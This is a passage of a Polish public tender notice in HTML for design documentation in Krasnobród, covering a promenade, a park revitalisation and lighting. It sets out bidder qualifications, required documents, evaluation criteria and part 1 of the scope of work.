- Kosztorys inwestorski w wersji PDF.
- Kosztorysy ofertowe w wersji PDF.
- SSTWiORB w wersji WORD lub PDF.
 
Projektant opracowujący projekty budowlano-wykonawcze  zobowiązany jest do:
-  uzgodnienia projektów budowlano-wykonawczych z Dyrekcją Krasnobrodzkiego Parku Krajobrazowego.
- uzgodnienia przyjętych rozwiązań projektowych z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie Delegatura w Zamościu. 

Wszystkie projekty Wykonawca opracuje na mapie do celów projektowych którą uzyska własnym staraniem.  

<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><b> Dodatkowe kody CPV:</b>79421200-3,
                71220000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 45<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie ustanawia szczegółowego warunku w tym zakresie.  <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie ustanawia szczegółowego warunku w tym zakresie.  <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek udziału w postępowaniu w części zamówienia nr 1
Określenie warunków: 
W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki dotyczące: 1) Posiadania zdolności zawodowej. Zamawiający dokona oceny spełniania warunku udziału polegającego na posiadaniu zdolności zawodowej w oparciu o załącznik WYKAZ WYKONANYCH USŁUG. Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 1 usługę polegającą na wykonaniu projektu budowlano-wykonawczego branży drogowej i udokumentuje, że usługa ta została wykonana należycie. Wartość wykonanej usługi nie może być mniejsza niż 20 000,00 zł brutto.

Zamawiający wymaga aby dla realizacji części zamówienia nr 1 Wykonawca dysponował następującą kadrą techniczną odpowiedzialną za świadczenie usługi projektowej:

Wykonawca spełni warunek posiadania zdolności zawodowej w części zamówienia nr 1  jeśli będzie dysponował co najmniej jedną osobą posiadającą uprawnienia  projektowe upoważniające do pełnienia samodzielnej funkcji projektanta w specjalności konstrukcyjno-inżynieryjnej w zakresie projektowania dróg.
 
Ocena spełniania warunku udziału w postępowaniu zostanie 
przeprowadzona na podstawie załączonych dokumentów metodą spełnia - nie spełnia. 

Warunek udziału w postępowaniu w części zamówienia nr 2

Określenie warunków: W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki dotyczące: 1) Posiadania zdolności zawodowej. Zamawiający dokona oceny spełniania warunku udziału polegającego na posiadaniu zdolności zawodowej w oparciu o załącznik WYKAZ WYKONANYCH USŁUG. Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 1 usługę polegającą na wykonaniu projektu budowlano-wykonawczego rewitalizacji i zagospodarowania zespołu pałacowo  parkowego lub projektu budowlano-wykonawczego rewitalizacji i zagospodarowania parku. Wartość wykonanej usługi nie może być mniejsza niż 20 000,00 zł brutto. 

Zamawiający wymaga aby dla realizacji części zamówienia nr 2 Wykonawca dysponował następującą kadrą techniczną odpowiedzialną za świadczenie usługi projektowej:

Wykonawca spełni warunek posiadania zdolności zawodowej w części zamówienia nr 2  jeśli będzie dysponował osobami posiadającymi  następujące kwalifikacje zawodowe:
- co najmniej jedną osobą posiadającą kwalifikacje architekta krajobrazu. 
- co najmniej jedną osobą posiadającą uprawnienia  projektowe upoważniające do pełnienia samodzielnej funkcji projektanta w specjalności konstrukcyjno-inżynieryjnej w zakresie projektowania dróg.
- co najmniej jedną osobą posiadającą uprawnienia  projektowe upoważniające do pełnienia samodzielnej funkcji projektanta w specjalności architektonicznej lub konstrukcyjno budowlanej w zakresie projektowania budynków.
 
Ocena spełniania warunku udziału w postępowaniu zostanie 
przeprowadzona na podstawie załączonych dokumentów metodą spełnia - nie spełnia. 



Warunek udziału w postępowaniu w części zamówienia nr 3

Określenie warunków: W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki dotyczące: 1) Posiadania zdolności zawodowej. Zamawiający dokona oceny spełniania warunku udziału polegającego na posiadaniu zdolności zawodowej w oparciu o załącznik WYKAZ WYKONANYCH USŁUG. Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 1 usługę polegającą na wykonaniu projektu budowlano-wykonawczego oświetlenia ulicznego lub oświetlenia parkowego. Wartość wykonanej usługi nie może być mniejsza niż 15 000,00 zł brutto. 

Zamawiający wymaga aby dla realizacji części zamówienia nr 3 Wykonawca dysponował następującą kadrą techniczną odpowiedzialną za świadczenie usługi projektowej:

Wykonawca spełni warunek posiadania zdolności zawodowej w części zamówienia nr 3  jeśli będzie dysponował co najmniej jedną osobą posiadającą uprawnienia  projektowe upoważniające do pełnienia samodzielnej funkcji projektanta w specjalności instalacyjno-inżynieryjnej w zakresie projektowania sieci i instalacji elektrycznych. 
Ocena spełniania warunku udziału w postępowaniu zostanie 
przeprowadzona na podstawie załączonych dokumentów metodą spełnia - nie spełnia. 


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawca powołujący się na mocy art. 22a ust 1 Ustawy przy wykazaniu spełniania warunków udziału w postępowaniu na zdolnościach zawodowych innych podmiotów, które będą brały udział w realizacji części zamówienia, jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w formie oryginału pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda przedłożenia następujących dokumentów:
1)Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia a podstawie art.24 ust.5 pkt 1 ustawy. 
2)Oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej. W przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poz terytorium Rzeczypospolitej Polskiej, zamiast odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej składa dokument potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba której dokument dotyczy, nie wydaje się takiego dokumentu zastępuje się go dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z wykonawców składających ofertę wspólną oddzielnie musi złożyć dokumenty wyszczególnione w punktach od 1 do 2. Wykonawca, który zamierzy powierzyć wykonanie części zamówienia podwykonawcom zobowiązany jest do złożenia dokumentów dotyczących podwykonawców określonych w pkt. 1-2, w celu zbadania czy nie zachodzą wobec tego podmiotu podstawy wykluczenia o których mowa w art. 24 ust. 1 pkt. 13-22 i ust. 5 Ustawy. Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego w pkt 1.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności zawodowej zamawiający żąda przedłożenia następujących dokumentów: a) Wykaz usług wykonanych w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
b)Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi zasobami. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
Wykonawcy przedstawiają pełnomocnictwo osoby wyznaczonej do reprezentowania ich w
postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i podpisania
umowy w sprawie zamówienia publicznego.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Należy podać informacje na temat udzielania zaliczek:
                  <br />Zamawiający przewiduje możliwosć udzielenia zaliczki wykonawcom na poczet opracowania map do celów projektowych. </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90.00</td></tr><tr><td>termin płatności</td><td>10.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, polegających na:
1) zmianie wynagrodzenia Umowy w przypadku, gdy zmianie uległy stawki podatku VAT - wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie takie samo,  a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie 
2) zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 22a ust. 1 ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca  spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia. 
3) rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się  w złożonej ofercie, na zasadach określonych w art. 22a ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia. 
4) powierzeniu podwykonawcy części zamówienia  w przypadku, gdy Wykonawca w ofercie nie wskazał części, którą na etapie realizacji zamówienia zamierza powierzyć podwykonawcy. W takim przypadku Wykonawca winien stosować zasady wynikające z § 12 umowy. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie - Opracowanie projektu  budowlano-wykonawczego promenady spacerowej w  ul. Młyńskiej. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Projekt promenady spacerowej o szerokości 5m od projektowanego skrzyżowania drogi powiatowej nr 3260L ciągu drogowego Krasnobród  Jacnia do rzeki Wieprz ( W zakres opracowania nie wchodzi zaprojektowanie utwardzenia nawierzchni na jazie). Nawierzchnię promenady należy projektować  jako utwardzoną, okrawężnikowaną. Rodzaj nawierzchni kostka brukowa gr. 8cm  wzoru starobruk  lub stare miasto lub bruk staromiejski. Szerokość jezdni na całym projektowanym odcinku ma wynosić nie mniej jak 5m. Długość projektowanego odcinka około 800m.
Wzdłuż projektowanego odcinka promenady spacerowej należy zaprojektować lokalne utwardzenia z kostki brukowej pod ustawienie ławek parkowych. Ilość  ławek jaka będzie zaprojektowana przy promenadzie wynosi nie mniej niż 10 sztuk.  W miejscach gdzie niezbędne będzie umocnienie skarp należy zastosować umocnienia (ubezpieczenia) płytami ażurowymi typu MEBA.   
Projektowanie promenady winno uwzględniać  w sposób maksymalny zachowanie istniejącego drzewostanu wzdłuż promenady. Do wycinki należy przewidzieć  tylko drzewostan oceniony przez dendrologa jako znajdujący się w złej kondycji lub zagrażający bezpieczeństwu pieszych.   

Wraz z projektem budowlano-wykonawczym promenady wykonawca opracuje  projekt organizacji ruchu. Na całym odcinku promenady ma obowiązywać  zakaz ruchu  w obu kierunkach. Projektant może zaprojektować na promenadzie progi zwalniające wykonane z kostki brukowej (progi zwalniające wg instrukcji o sygnałach i znakach drogowych) jeśli organ zarządzający ruchem na drogach zaleci w trakcie uzgadniania projektu  organizacji ruchu zaprojektowanie progów zwalniających.  
Przedmiot zamówienia określony jako część zamówienia nr 1 wykonawca przekaże Zamawiającemu w następujących ilościach:
1. Projekty budowlane - 5 egzemplarzy.
(Projekt budowlany wraz z niezbędnymi uzgodnieniami ma umożliwiać uzyskanie pozwolenie na budowę, o którym mowa w ustawie Prawo budowlane oraz  spełniać wymagania Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462).
2. Projekty wykonawcze - 5 egzemplarzy. 
(Projekty wykonawcze muszą uwzględniać wymagania określone w § 5 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).

3. Kosztorysy inwestorskie - 2 egzemplarze
Kosztorysy inwestorskie będą sporządzone w oparciu o przepisy zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym  Dz. U. z 2004, Nr 130 poz.1389.
4. Kosztorysy ofertowe - 1 egzemplarz.
5. Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 1 egzemplarz.
Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).
6.  Wersje cyfrowe dokumentacji - 2 płyty CD zawierające: 
- Projekt budowlany i projekt wykonawczy skanowany do PDF lub zapisany w formacie PDF). 
- Kosztorys inwestorski w wersji PDF.
- Kosztorysy ofertowe w wersji PDF.
- SSTWiORB w wersji WORD lub PDF.
 
7. Projekt czasowej organizacji ruchu na czas budowy oraz projekt stałej organizacji ruchu   2 egzemplarze. 
Projektant opracowujący projekty budowlano-wykonawcze  zobowiązany jest do:
-  uzgodnienia projektów budowlano-wykonawczych z Dyrekcją Krasnobrodzkiego Parku Krajobrazowego.
